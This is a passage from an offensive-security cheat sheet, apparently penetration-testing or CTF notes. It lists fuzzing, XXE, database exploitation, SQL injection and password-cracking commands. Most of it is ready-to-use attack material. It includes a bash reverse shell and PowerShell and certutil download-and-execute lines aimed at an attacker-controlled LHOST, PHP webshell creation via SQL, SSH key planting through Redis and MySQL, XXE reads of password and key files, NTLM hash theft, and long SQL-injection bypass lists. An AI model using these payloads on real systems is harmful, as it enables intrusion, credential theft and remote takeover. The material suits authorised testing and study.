Vulnerabilities\n\n```c\nASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution\nSVG: Stored XSS / Server-Side Request Forgery\nGIF: Stored XSS\nCSV: CSV Injection\nXML: XXE\nAVI: Local File Inclusion / Server-Side request Forgery\nHTML/JS: HTML Injection / XSS / Open Redirect\nPNG / JPEG: Pixel Flood Attack\nZIP: Remote Code Exection via Local File Inclusion\nPDF / PPTX: Server-Side Request Forgery / Blind XXE\n```\n\n#### wfuzz\n\n```c\nwfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://\u003cRHOST\u003e/FUZZ/\u003cFILE\u003e.php --hc '403,404'\n```\n\n##### Write to File\n\n```c\nwfuzz -w /PATH/TO/WORDLIST -c -f \u003cFILE\u003e -u http://\u003cRHOST\u003e --hc 403,404\n```\n\n##### Custom Scan with limited Output\n\n```c\nwfuzz -w /PATH/TO/WORDLIST -u http://\u003cRHOST\u003e/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20\n```\n\n##### Fuzzing two Parameters at once\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://\u003cRHOST\u003e:/\u003cdirectory\u003e/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c\n```\n\n##### Domain\n\n```c\nwfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.\u003cRHOST\u003e' -u http://\u003cRHOST\u003e/\n```\n\n##### Subdomain\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H \"Host: FUZZ.\u003cRHOST\u003e\" --hc 200 --hw 356 -t 100 \u003cRHOST\u003e\n```\n\n##### Git\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://\u003cRHOST\u003e/FUZZ --hc 403,404\n```\n##### Login\n\n```c\nwfuzz -X POST -u \"http://\u003cRHOST\u003e:\u003cRPORT\u003e/login.php\" -d \"email=FUZZ\u0026password=\u003cPASSWORD\u003e\" -w /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --hc 200 -c\nwfuzz -X POST -u \"http://\u003cRHOST\u003e:\u003cRPORT\u003e/login.php\" -d \"username=FUZZ\u0026password=\u003cPASSWORD\u003e\" -w /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --ss \"Invalid login\"\n```\n\n##### SQL\n\n```c\nwfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://\u003cRHOST\u003e/select http\n```\n\n##### DNS\n\n```c\nwfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H \"Origin: http://FUZZ.\u003cRHOST\u003e\" --filter \"r.headers.response~'Access-Control-Allow-Origin'\" http://\u003cRHOST\u003e/\nwfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e -t 100\nwfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e --hw \u003cvalue\u003e -t 100\n```\n\n##### Numbering Files\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip\n```\n\n##### Enumerating PIDs\n\n```c\nwfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000\n```\n\n#### WPScan\n\n```c\nwpscan --url https://\u003cRHOST\u003e --enumerate u,t,p\nwpscan --url https://\u003cRHOST\u003e --plugins-detection aggressive\nwpscan --url https://\u003cRHOST\u003e --disable-tls-checks\nwpscan --url https://\u003cRHOST\u003e --disable-tls-checks --enumerate u,t,p\nwpscan --url http://\u003cRHOST\u003e -U \u003cUSERNAME\u003e -P passwords.txt -t 50\n```\n\n#### XML External Entity (XXE)\n\n##### Skeleton Payload Request\n\n```c\nGET / HTTP/1.1\nHost: \u003cRHOST\u003e:\u003cRPORT\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Length: 136\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" ?\u003e\n\u003c!DOCTYPE test [\u003c!ENTITY xxe SYSTEM \"http://\u003cLHOST\u003e:80/shell.php\" \u003e]\u003e\n\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e\n```\n\n##### Payloads\n\n```c\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u003c!DOCTYPE xxe [ \u003c!ENTITY passwd SYSTEM 'file:///etc/passwd'\u003e ]\u003e\n \u003cstockCheck\u003e\u003cproductId\u003e\u0026passwd;\u003c/productId\u003e\u003cstoreId\u003e1\u003c/storeId\u003e\u003c/stockCheck\u003e\n```\n\n```c\n\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE root [\u003c!ENTITY test SYSTEM 'file:///c:/windows/win.ini'\u003e]\u003e\u003corder\u003e\u003cquantity\u003e3\u003c/quantity\u003e\u003citem\u003e\u0026test;\u003c/item\u003e\u003caddress\u003e17th Estate, CA\u003c/address\u003e\u003c/order\u003e\n```\n\n```c\nusername=%26username%3b\u0026version=1.0.0--\u003e\u003c!DOCTYPE+username+[+\u003c!ENTITY+username+SYSTEM+\"/root/.ssh/id_rsa\"\u003e+]\u003e\u003c!--\n```\n\n### Database Analysis\n\n#### impacket-mssqlclient\n\n##### Common Commands\n\n```c\nenum_logins\nenum_impersonate\n```\n\n##### Connection\n\n```c\nimpacket-mssqlclient \u003cUSERNAME\u003e@\u003cRHOST\u003e\nimpacket-mssqlclient \u003cUSERNAME\u003e@\u003cRHOST\u003e -windows-auth\nimpacket-mssqlclient -k -no-pass \u003cRHOST\u003e\nimpacket-mssqlclient \u003cRHOST\u003e/\u003cUSERNAME\u003e:\u003cUSERNAME\u003e@\u003cRHOST\u003e -windows-auth\n```\n\n```c\nexport KRB5CCNAME=\u003cUSERNAME\u003e.ccache\nimpacket-mssqlclient -k \u003cRHOST\u003e.\u003cDOMAIN\u003e\n```\n\n#### MongoDB\n\n```c\nmongo \"mongodb://localhost:27017\"\n```\n\n```c\n\u003e use \u003cDATABASE\u003e;\n\u003e show tables;\n\u003e show collections;\n\u003e db.system.keys.find();\n\u003e db.users.find();\n\u003e db.getUsers();\n\u003e db.getUsers({showCredentials: true});\n\u003e db.accounts.find();\n\u003e db.accounts.find().pretty();\n\u003e use admin;\n```\n\n##### User Password Reset to \"12345\"\n\n```c\n\u003e db.getCollection('users').update({username:\"admin\"}, { $set: {\"services\" : { \"password\" : {\"bcrypt\" : \"$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG\" } } } })\n```\n\n#### MSSQL\n\n##### Connection\n\n```c\nsqlcmd -S \u003cRHOST\u003e -U \u003cUSERNAME\u003e -P '\u003cPASSWORD\u003e'\nimpacket-mssqlclient \u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e -windows-auth\n```\n\n##### Common Commands\n\n```c\nSELECT @@version;\nSELECT name FROM sys.databases;\nSELECT * FROM \u003cDATABASE\u003e.information_schema.tables;\nSELECT * FROM \u003cDATABASE\u003e.dbo.users;\n```\n\n##### Show Database Content\n\n```c\n1\u003e SELECT name FROM master.sys.databases\n2\u003e go\n```\n\n##### OPENQUERY\n\n```c\n1\u003e select * from openquery(\"web\\clients\", 'select name from master.sys.databases');\n2\u003e go\n```\n\n```c\n1\u003e select * from openquery(\"web\\clients\", 'select name from clients.sys.objects');\n2\u003e go\n```\n\n##### Binary Extraction as Base64\n\n```c\n1\u003e select cast((select content from openquery([web\\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;\n2\u003e go \u003e export.txt\n```\n\n##### Steal NetNTLM Hash / Relay Attack\n\n```c\nSQL\u003e exec master.dbo.xp_dirtree '\\\\\u003cLHOST\u003e\\FOOBAR'\n```\n\n##### Linked SQL Server Enumeration\n\n```c\nSQL\u003e SELECT user_name();\nSQL\u003e SELECT name,sysadmin FROM syslogins;\nSQL\u003e SELECT srvname,isremote FROM sysservers;\nSQL\u003e EXEC ('SELECT current_user') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\nSQL\u003e EXEC ('SELECT srvname,isremote FROM sysservers') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\nSQL\u003e EXEC ('EXEC (''SELECT suser_name()'') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e]') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\n```\n\n##### xp_cmdshell\n\n```c\nSQL\u003e EXECUTE AS LOGIN = 'sa';\nSQL\u003e EXEC sp_configure 'Show Advanced Options', 1; \nSQL\u003e RECONFIGURE; \nSQL\u003e EXEC sp_configure 'xp_cmdshell', 1; \nSQL\u003e RECONFIGURE;\nSQL\u003e EXEC xp_cmdshell 'dir';\n```\n\n```c\nSQL\u003e EXEC sp_configure 'Show Advanced Options', 1;\nSQL\u003e reconfigure;\nSQL\u003e sp_configure;\nSQL\u003e EXEC sp_configure 'xp_cmdshell', 1;\nSQL\u003e reconfigure\nSQL\u003e xp_cmdshell \"whoami\"\n```\n\n```c\nSQL\u003e enable_xp_cmdshell\nSQL\u003e xp_cmdshell whoami\n```\n\n```c\n';EXEC master.dbo.xp_cmdshell 'ping \u003cLHOST\u003e';--\n';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://\u003cLHOST\u003e/shell.exe C:\\\\Windows\\temp\\\u003cFILE\u003e.exe';--\n';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\\\Windows\\\\temp\\\\\u003cFILE\u003e.exe';--\n```\n\n#### MySQL\n\n```c\nmysql -u root -p\nmysql -u \u003cUSERNAME\u003e -h \u003cRHOST\u003e -p\n```\n\n```c\nmysql\u003e STATUS;\nmysql\u003e SHOW databases;\nmysql\u003e USE \u003cDATABASE\u003e;\nmysql\u003e SHOW tables;\nmysql\u003e DESCRIBE \u003cTABLE\u003e;\nmysql\u003e SELECT version();\nmysql\u003e SELECT system_user();\nmysql\u003e SELECT * FROM Users;\nmysql\u003e SELECT * FROM users \\G;\nmysql\u003e SELECT Username,Password FROM Users;\nmusql\u003e SELECT user, authentication_string FROM mysql.user WHERE user = '\u003cUSERNAME\u003e';\nmysql\u003e SELECT LOAD_FILE('/etc/passwd');\nmysql\u003e SELECT LOAD_FILE('C:\\\\PATH\\\\TO\\\\FILE\\\\\u003cFILE\u003e');\nmysql\u003e SHOW GRANTS FOR '\u003cUSERNAME\u003e'@'localhost' \\G;\n```\n\n##### Update User Password\n\n```c\nmysql\u003e update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1;\n```\n\n##### Drop a Shell\n\n```c\nmysql\u003e \\! /bin/sh\n```\n\n##### Insert Code to get executed\n\n```c\nmysql\u003e insert into users (id, email) values (\u003cLPORT\u003e, \"- E $(bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261')\");\n```\n\n##### Write SSH Key into authorized_keys2 file\n\n```c\nmysql\u003e SELECT \"\u003cKEY\u003e\" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\\n';\n```\n\n#### NoSQL Injection\n\n```c\nadmin'||''==='\n{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null} }\n```\n\n#### PostgreSQL\n\n```c\npsql\npsql -h \u003cLHOST\u003e -U \u003cUSERNAME\u003e -c \"\u003cCOMMAND\u003e;\"\npsql -h \u003cRHOST\u003e -p 5432 -U \u003cUSERNAME\u003e -d \u003cDATABASE\u003e\npsql -h \u003cRHOST\u003e -p 5432 -U \u003cUSERNAME\u003e -d \u003cDATABASE\u003e\n```\n\n##### Common Commands\n\n```c\npostgres=# \\list // list all databases\npostgres=# \\c // use database\npostgres=# \\c \u003cDATABASE\u003e // use specific database\npostgres=# \\s // command history\npostgres=# \\q // quit\n\u003cDATABASE\u003e=# \\dt // list tables from current schema\n\u003cDATABASE\u003e=# \\dt *.* // list tables from all schema\n\u003cDATABASE\u003e=# \\du // list users roles\n\u003cDATABASE\u003e=# \\du+ // list users roles\n\u003cDATABASE\u003e=# SELECT user; // get current user\n\u003cDATABASE\u003e=# TABLE \u003cTABLE\u003e; // select table\n\u003cDATABASE\u003e=# SELECT * FROM users; // select everything from users table\n\u003cDATABASE\u003e=# SHOW rds.extensions; // list installed extensions\n\u003cDATABASE\u003e=# SELECT usename, passwd from pg_shadow; // read credentials\n```\n\n##### Postgres Remote Code Execution\n\n```c\n\u003cDATABASE\u003e=# DROP TABLE IF EXISTS cmd_exec;\n\u003cDATABASE\u003e=# CREATE TABLE cmd_exec(cmd_output text);\n\u003cDATABASE\u003e=# COPY cmd_exec FROM PROGRAM 'id';\n\u003cDATABASE\u003e=# SELECT * FROM cmd_exec;\n\u003cDATABASE\u003e=# DROP TABLE IF EXISTS cmd_exec;\n```\n\n#### Redis\n\n```c\n\u003e AUTH \u003cPASSWORD\u003e\n\u003e AUTH \u003cUSERNAME\u003e \u003cPASSWORD\u003e\n\u003e INFO SERVER\n\u003e INFO keyspace\n\u003e CONFIG GET *\n\u003e SELECT \u003cNUMBER\u003e\n\u003e KEYS *\n\u003e HSET // set value if a field within a hash data structure\n\u003e HGET // retrieves a field and his value from a hash data structure\n\u003e HKEYS // retrieves all field names from a hash data structure\n\u003e HGETALL // retrieves all fields and values from a hash data structure\n\u003e GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b\n\u003e SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b \"username|s:8:\\\"\u003cUSERNAME\u003e\\\";role|s:5:\\\"admin\\\";auth|s:4:\\\"True\\\";\" # the value \"s:8\" has to match the length of the username\n```\n\n##### Enter own SSH Key\n\n```c\nredis-cli -h \u003cRHOST\u003e\necho \"FLUSHALL\" | redis-cli -h \u003cRHOST\u003e\n(echo -e \"\\n\\n\"; cat ~/.ssh/id_rsa.pub; echo -e \"\\n\\n\") \u003e /PATH/TO/FILE/\u003cFILE\u003e.txt\ncat /PATH/TO/FILE/\u003cFILE\u003e.txt | redis-cli -h \u003cRHOST\u003e -x set s-key\n\u003cRHOST\u003e:6379\u003e get s-key\n\u003cRHOST\u003e:6379\u003e CONFIG GET dir\n1) \"dir\"\n2) \"/var/lib/redis\"\n\u003cRHOST\u003e:6379\u003e CONFIG SET dir /var/lib/redis/.ssh\nOK\n\u003cRHOST\u003e:6379\u003e CONFIG SET dbfilename authorized_keys\nOK\n\u003cRHOST\u003e:6379\u003e CONFIG GET dbfilename\n1) \"dbfilename\"\n2) \"authorized_keys\"\n\u003cRHOST\u003e:6379\u003e save\nOK\n```\n\n#### SQL Injection\n\n##### Master List\n\n```c\n';#--- // insert everywhere! Shoutout to xsudoxx!\nadmin' or '1'='1\n' or '1'='1\n\" or \"1\"=\"1\n\" or \"1\"=\"1\"--\n\" or \"1\"=\"1\"/*\n\" or \"1\"=\"1\"#\n\" or 1=1\n\" or 1=1 --\n\" or 1=1 -\n\" or 1=1--\n\" or 1=1/*\n\" or 1=1#\n\" or 1=1-\n\") or \"1\"=\"1\n\") or \"1\"=\"1\"--\n\") or \"1\"=\"1\"/*\n\") or \"1\"=\"1\"#\n\") or (\"1\"=\"1\n\") or (\"1\"=\"1\"--\n\") or (\"1\"=\"1\"/*\n\") or (\"1\"=\"1\"#\n) or '1`='1-\n```\n\n##### Authentication Bypass\n\n```c\n'-'\n' '\n'\u0026'\n'^'\n'*'\n' or 1=1 limit 1 -- -+\n'=\"or'\n' or ''-'\n' or '' '\n' or ''\u0026'\n' or ''^'\n' or ''*'\n'-||0'\n\"-||0\"\n\"-\"\n\" \"\n\"\u0026\"\n\"^\"\n\"*\"\n'--'\n\"--\"\n'--' / \"--\"\n\" or \"\"-\"\n\" or \"\" \"\n\" or \"\"\u0026\"\n\" or \"\"^\"\n\" or \"\"*\"\nor true--\n\" or true--\n' or true--\n\") or true--\n') or true--\n' or 'x'='x\n') or ('x')=('x\n')) or (('x'))=(('x\n\" or \"x\"=\"x\n\") or (\"x\")=(\"x\n\")) or ((\"x\"))=((\"x\nor 2 like 2\nor 1=1\nor 1=1--\nor 1=1#\nor 1=1/*\nadmin' --\nadmin' -- -\nadmin' #\nadmin'/*\nadmin' or '2' LIKE '1\nadmin' or 2 LIKE 2--\nadmin' or 2 LIKE 2#\nadmin') or 2 LIKE 2#\nadmin') or 2 LIKE 2--\nadmin') or ('2' LIKE '2\nadmin') or ('2' LIKE '2'#\nadmin') or ('2' LIKE '2'/*\nadmin' or '1'='1\nadmin' or '1'='1'--\nadmin' or '1'='1'#\nadmin' or '1'='1'/*\nadmin'or 1=1 or ''='\nadmin' or 1=1\nadmin' or 1=1--\nadmin' or 1=1#\nadmin' or 1=1/*\nadmin') or ('1'='1\nadmin') or ('1'='1'--\nadmin') or ('1'='1'#\nadmin') or ('1'='1'/*\nadmin') or '1'='1\nadmin') or '1'='1'--\nadmin') or '1'='1'#\nadmin') or '1'='1'/*\n1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055\nadmin\" --\nadmin';-- azer\nadmin\" #\nadmin\"/*\nadmin\" or \"1\"=\"1\nadmin\" or \"1\"=\"1\"--\nadmin\" or \"1\"=\"1\"#\nadmin\" or \"1\"=\"1\"/*\nadmin\"or 1=1 or \"\"=\"\nadmin\" or 1=1\nadmin\" or 1=1--\nadmin\" or 1=1#\nadmin\" or 1=1/*\nadmin\") or (\"1\"=\"1\nadmin\") or (\"1\"=\"1\"--\nadmin\") or (\"1\"=\"1\"#\nadmin\") or (\"1\"=\"1\"/*\nadmin\") or \"1\"=\"1\nadmin\") or \"1\"=\"1\"--\nadmin\") or \"1\"=\"1\"#\nadmin\") or \"1\"=\"1\"/*\n1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055\n```\n\n#### Common Injections\n\n##### MySQL \u0026 MariaDB\n\n###### Get Number of Columns\n\n```c\n-1 order by 3;#\n```\n\n###### Get Version\n\n```c\n-1 union select 1,2,version();#\n```\n\n###### Get Database Name\n\n```c\n-1 union select 1,2,database();#\n```\n\n###### Get Table Name\n\n```c\n-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=\"\u003cDATABASE\u003e\";#\n```\n\n###### Get Column Name\n\n```c\n-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=\"\u003cDATABASE\u003e\" and table_name=\"\u003cTABLE\u003e\";#\n```\n\n###### Read a File\n\n```c\nSELECT LOAD_FILE('/etc/passwd')\n```\n\n###### Dump Data\n\n```c\n-1 union select 1,2, group_concat(\u003cCOLUMN\u003e) from \u003cDATABASE\u003e.\u003cTABLE\u003e;#\n```\n\n###### Create Webshell\n\n```c\nLOAD_FILE('/etc/httpd/conf/httpd.conf')\nselect \"\u003c?php system($_GET['cmd']);?\u003e\" into outfile \"/var/www/html/\u003cFILE\u003e.php\";\n```\n\nor\n\n```c\nLOAD_FILE('/etc/httpd/conf/httpd.conf')\n' UNION SELECT \"\u003c?php system($_GET['cmd']);?\u003e\", null, null, null, null INTO OUTFILE \"/var/www/html/\u003cFILE\u003e.php\" -- //\n```\n\n##### MSSQL\n\n###### Authentication Bypass\n\n```c\n' or 1=1--\n```\n\n###### Get Version with Time-Based Injection\n\n```c\n' SELECT @@version; WAITFOR DELAY '00:00:10'; —\n```\n\n###### Enable xp_cmdshell\n\n```c\n' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--\n```\n\n###### Remote Code Execution (RCE)\n\n```c\n' exec xp_cmdshell \"powershell IEX (New-Object Net.WebClient).DownloadString('http://\u003cLHOST\u003e/\u003cFILE\u003e.ps1')\" ;--\n```\n\n##### Orcale SQL\n\n###### Authentication Bypass\n\n```c\n' or 1=1--\n```\n\n###### Get Number of Columns\n\n```c\n' order by 3--\n```\n\n###### Get Table Name\n\n```c\n' union select null,table_name,null from all_tables--\n```\n\n###### Get Column Name\n\n```c\n' union select null,column_name,null from all_tab_columns where table_name='\u003cTABLE\u003e'--\n```\n\n###### Dump Data\n\n```c\n' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--\n```\n\n##### SQLite\n\n###### Extracting Table Names\n\n```c\nhttp://\u003cRHOST\u003e/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--\n```\n\n###### Extracting User Table\n\n```c\nhttp://\u003cRHOST\u003e/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--\n```\n\n##### Error-based SQL Injection (SQLi)\n\n```c\n\u003cUSERNAME\u003e' OR 1=1 -- //\n```\n\nResults in:\n\n```c\nSELECT * FROM users WHERE user_name= '\u003cUSERNAME\u003e' OR 1=1 --\n```\n\n```c\n' or 1=1 in (select @@version) -- //\n' OR 1=1 in (SELECT * FROM users) -- //\n' or 1=1 in (SELECT password FROM users) -- //\n' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //\n```\n\n##### UNION-based SQL Injection (SQLi)\n\n###### Manual Injection Steps\n\n```c\n$query = \"SELECT * FROM customers WHERE name LIKE '\".$_POST[\"search_input\"].\"%'\";\n```\n\n```c\n' ORDER BY 1-- //\n```\n\n```c\n%' UNION SELECT database(), user(), @@version, null, null -- //\n```\n\n```c\n' UNION SELECT null, null, database(), user(), @@version -- //\n```\n\n```c\n' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //\n```\n\n```c\n' UNION SELECT null, username, password, description, null FROM users -- //\n```\n\n##### Blind SQL Injection (SQLi)\n\n```c\nhttp://\u003cRHOST\u003e/index.php?user=\u003cUSERNAME\u003e' AND 1=1 -- //\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?user=\u003cUSERNAME\u003e' AND IF (1=1, sleep(3),'false') -- //\n```\n\n#### SQL Truncation Attack\n\n```c\n'admin@\u003cFQDN\u003e' = 'admin@\u003cFQDN\u003e++++++++++++++++++++++++++++++++++++++htb'\n```\n\n#### sqlite3\n\n```c\nsqlite3 \u003cFILE\u003e.db\n```\n\n```c\nsqlite\u003e .tables\nsqlite\u003e PRAGMA table_info(\u003cTABLE\u003e);\nsqlite\u003e SELECT * FROM \u003cTABLE\u003e;\n```\n\n#### sqsh\n\n```c\nsqsh -S \u003cRHOST\u003e -U \u003cUSERNAME\u003e\nsqsh -S '\u003cRHOST\u003e' -U '\u003cUSERNAME\u003e' -P '\u003cPASSWORD\u003e'\nsqsh -S '\u003cRHOST\u003e' -U '.\\\u003cUSERNAME\u003e' -P '\u003cPASSWORD\u003e'\n```\n\n##### List Files and Folders with xp_dirtree\n\n```c\nEXEC master.sys.xp_dirtree N'C:\\inetpub\\wwwroot\\',1,1;\n```\n\n### Password Attacks\n\n## DonPAPI\n\n```c\nDonPAPI \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e\nDonPAPI -local_auth \u003cUSERNAME\u003e@\u003cRHOST\u003e\nDonPAPI --hashes \u003cLM\u003e:\u003cNT\u003e \u003cDOMAIN\u003e/\u003cUSERNAME\u003e@\u003cRHOST\u003e\nDonPAPI -laps \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e\n```\n\n#### fcrack\n\n```c\nfcrackzip -u -D -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e \u003cFILE\u003e.zip\n```\n\n#### Group Policy Preferences (GPP)\n\n##### gpp-decrypt\n\n```c\npython3 gpp-decrypt.py -f Groups.xml\npython3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\n```\n\n#### hashcat\n\n\u003e https://hashcat.net/hashcat/\n\n\u003e https://hashcat.net/wiki/doku.php?id=hashcat\n\n\u003e https://hashcat.net/cap2hashcat/\n\n\u003e https://hashcat.net/wiki/doku.php?id=example_hashes\n\n```c\nhashcat -m 0 md5 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 100 sha-1 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1400 sha256 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 3200 bcrypt /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 900 md4 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1000 ntlm /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1800 sha512 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 160 hmac-sha1 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force\nhashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3\n```\n\n```c\nhashcat --example-hashes\nhashcat --help | grep -i \"ntlm\"\n```\n\n```c\nhashcat --identify --user \u003cFILE\u003e\n```\n\n```c\n/usr/share/wordlists/fasttrack.txt\n/usr/share/hashcat/rules/best64.rule\n```\n\n##### Custom Rules\n\n\u003e https://hashcat.net/wiki/doku.php?id=rule_based_attack\n\n###### Add a 1 to each Password\n\n```c\necho \\$1 \u003e \u003cFILE\u003e.rule\n```\n\n###### Capitalize first character\n\n```c\n$1\nc\n```\n\n###### Add nothing, a 1 or a ! to an existing Wordlist\n\n```c\n:\n$1\n$!\n```\n\n###### Rule for upper case Letter, numerical Value and special Character\n\n- $1 \u003e appends a \"1\"\n- $2 \u003e appends a \"2\"\n- $3 \u003e appends a \"3\"\n- c \u003e Capitalize the first character and lower case the rest\n\n```c\n$1 c $!\n$2 c $!\n$1 $2 $3 c $!\n```\n\n###### Rule Preview\n\n```c\nhashcat -r \u003cFILE\u003e.rule --stdout \u003cFILE\u003e.txt\n```\n\n##### Cracking ASPREPRoast Password File\n\n```c\nhashcat -m 18200 -a 0 \u003cFILE\u003e \u003cFILE\u003e\n```\n\n##### Cracking Kerberoasting Password File\n\n```c\nhashcat -m 13100 --force \u003cFILE\u003e \u003cFILE\u003e\n```\n\n##### Bruteforce based on the Pattern\n\n```c\nhashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout\n```\n\n##### Generate Password Candidates: Wordlist + Pattern\n\n```c\nhashcat -a6 -m0 \"e99a18c428cb38d5f260853678922e03\" yourPassword|/PATH/TO/WORDLIST/\u003cWORDLIST\u003e ?d?d?d?u?u?u --force --potfile-disable --stdout\n```\n\n##### Generate NetNLTMv2 with internalMonologue and crack with hashcat\n\n```c\nInternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800\n```\n\n###### Result\n\n```c\nspotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000\n```\n\n##### Crack with hashcat\n\n```c\nhashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --force --potfile-disable\n```\n\n##### Rules\n\n\u003e https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule\n\n##### Cracking with OneRuleToRuleThemAll.rule\n\n```c\nhashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule\n```\n\n#### Hydra\n\n```c\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -p \u003cPASSWORD\u003e \u003cPROTOCOL\u003e\nhydra \u003cRHOST\u003e -L /PATH/TO/WORDLIST/\u003cFILE\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e \u003cPROTOCOL\u003e\nhydra \u003cRHOST\u003e -C /PATH/TO/WORDLIST/\u003cFILE\u003e ftp\n```\n\n```c\nexport HYDRA_PROXY=connect://127.0.0.1:8080\nunset HYDRA_PROXY\n```\n\n```c\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/admin.php:username=^USER^\u0026password=^PASS^:login_error\"\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/index.php:username=user\u0026password=^PASS^:Login failed. 